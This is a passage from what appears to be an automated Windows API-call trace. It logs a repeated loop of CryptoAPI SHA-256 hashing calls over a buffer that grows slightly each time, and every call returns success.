Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.948] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x680, dwFlags=0x0) returned 1 [0230.948] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.948] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3216a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3216a0, pdwDataLen=0x12e8b8) returned 1 [0230.948] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.948] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.948] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.949] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.949] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6a0, dwFlags=0x0) returned 1 [0230.949] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.949] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3216d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3216d0, pdwDataLen=0x12e8b8) returned 1 [0230.949] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.949] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.949] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.949] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.949] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6c0, dwFlags=0x0) returned 1 [0230.949] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.949] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321700, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321700, pdwDataLen=0x12e8b8) returned 1 [0230.949] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.949] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.949] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.950] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.950] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x6e0, dwFlags=0x0) returned 1 [0230.950] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.950] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321730, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321730, pdwDataLen=0x12e8b8) returned 1 [0230.950] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.950] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.950] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.950] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.950] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x700, dwFlags=0x0) returned 1 [0230.950] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.950] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321760, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321760, pdwDataLen=0x12e8b8) returned 1 [0230.951] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.951] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.951] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.951] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.951] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x720, dwFlags=0x0) returned 1 [0230.951] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.951] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321790, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321790, pdwDataLen=0x12e8b8) returned 1 [0230.951] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.951] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.951] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.951] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.952] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x740, dwFlags=0x0) returned 1 [0230.952] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.952] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3217c0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3217c0, pdwDataLen=0x12e8b8) returned 1 [0230.952] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.952] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.952] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.952] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.952] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x760, dwFlags=0x0) returned 1 [0230.952] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.952] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3217f0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3217f0, pdwDataLen=0x12e8b8) returned 1 [0230.952] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.952] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.952] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.953] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.953] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x780, dwFlags=0x0) returned 1 [0230.953] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.953] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321820, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321820, pdwDataLen=0x12e8b8) returned 1 [0230.953] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.953] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.953] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.953] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.953] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7a0, dwFlags=0x0) returned 1 [0230.953] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.953] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321850, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321850, pdwDataLen=0x12e8b8) returned 1 [0230.953] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.953] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.953] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.954] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.954] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7c0, dwFlags=0x0) returned 1 [0230.954] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.954] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321880, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321880, pdwDataLen=0x12e8b8) returned 1 [0230.954] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.954] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.954] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.954] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.954] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x7e0, dwFlags=0x0) returned 1 [0230.954] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.954] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3218b0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3218b0, pdwDataLen=0x12e8b8) returned 1 [0230.954] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.954] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.954] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.955] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.955] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x800, dwFlags=0x0) returned 1 [0230.955] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.955] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3218e0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3218e0, pdwDataLen=0x12e8b8) returned 1 [0230.955] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.955] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.955] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.955] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.955] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x820, dwFlags=0x0) returned 1 [0230.955] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.955] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321910, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321910, pdwDataLen=0x12e8b8) returned 1 [0230.955] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.955] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.955] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.956] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.956] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x840, dwFlags=0x0) returned 1 [0230.956] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.956] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321940, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321940, pdwDataLen=0x12e8b8) returned 1 [0230.956] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.956] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.956] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.956] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.956] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x860, dwFlags=0x0) returned 1 [0230.956] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.956] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321970, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321970, pdwDataLen=0x12e8b8) returned 1 [0230.956] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.956] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.956] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.957] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.957] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x880, dwFlags=0x0) returned 1 [0230.957] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.957] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3219a0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3219a0, pdwDataLen=0x12e8b8) returned 1 [0230.957] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.957] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.957] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.957] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.957] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8a0, dwFlags=0x0) returned 1 [0230.957] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.957] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x3219d0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x3219d0, pdwDataLen=0x12e8b8) returned 1 [0230.957] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.957] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.957] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.958] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.958] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8c0, dwFlags=0x0) returned 1 [0230.958] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.958] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321a00, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321a00, pdwDataLen=0x12e8b8) returned 1 [0230.958] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.958] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.958] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.958] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.958] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x8e0, dwFlags=0x0) returned 1 [0230.958] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.959] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321a30, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321a30, pdwDataLen=0x12e8b8) returned 1 [0230.959] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.959] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.959] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.959] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.959] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x900, dwFlags=0x0) returned 1 [0230.959] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.959] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321a60, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321a60, pdwDataLen=0x12e8b8) returned 1 [0230.959] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.959] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.959] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.960] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.960] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x920, dwFlags=0x0) returned 1 [0230.960] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.960] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321a90, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321a90, pdwDataLen=0x12e8b8) returned 1 [0230.960] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.960] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.960] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.961] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.961] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x940, dwFlags=0x0) returned 1 [0230.961] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.961] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321ac0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321ac0, pdwDataLen=0x12e8b8) returned 1 [0230.961] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.961] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.961] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.961] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.961] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x960, dwFlags=0x0) returned 1 [0230.961] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.961] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321af0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321af0, pdwDataLen=0x12e8b8) returned 1 [0230.961] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.961] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.961] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.962] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.962] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x980, dwFlags=0x0) returned 1 [0230.962] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.962] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321b20, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321b20, pdwDataLen=0x12e8b8) returned 1 [0230.962] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.962] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.962] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.962] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.962] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9a0, dwFlags=0x0) returned 1 [0230.962] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.962] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321b50, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321b50, pdwDataLen=0x12e8b8) returned 1 [0230.962] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.962] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.962] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.963] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.963] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9c0, dwFlags=0x0) returned 1 [0230.963] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.963] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321b80, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321b80, pdwDataLen=0x12e8b8) returned 1 [0230.963] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.963] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.963] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.963] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.963] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0x9e0, dwFlags=0x0) returned 1 [0230.963] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x4, pbData=0x12e8b8, pdwDataLen=0x12e860, dwFlags=0x0 | out: pbData=0x12e8b8, pdwDataLen=0x12e860) returned 1 [0230.963] CryptGetHashParam (in: hHash=0x2e4f40, dwParam=0x2, pbData=0x321bb0, pdwDataLen=0x12e8b8, dwFlags=0x0 | out: pbData=0x321bb0, pdwDataLen=0x12e8b8) returned 1 [0230.963] CryptDestroyHash (hHash=0x2e4f40) returned 1 [0230.963] CryptReleaseContext (hProv=0x304f30, dwFlags=0x0) returned 1 [0230.963] CryptAcquireContextW (in: phProv=0x12e870, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x12e870*=0x304f30) returned 1 [0230.964] CryptCreateHash (in: hProv=0x304f30, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12e868 | out: phHash=0x12e868) returned 1 [0230.964] CryptHashData (hHash=0x2e4f40, pbData=0x31e420, dwDataLen=0xa00, dwFlags=0x0) returned 1 [0230.964] CryptGetHashParam (in: 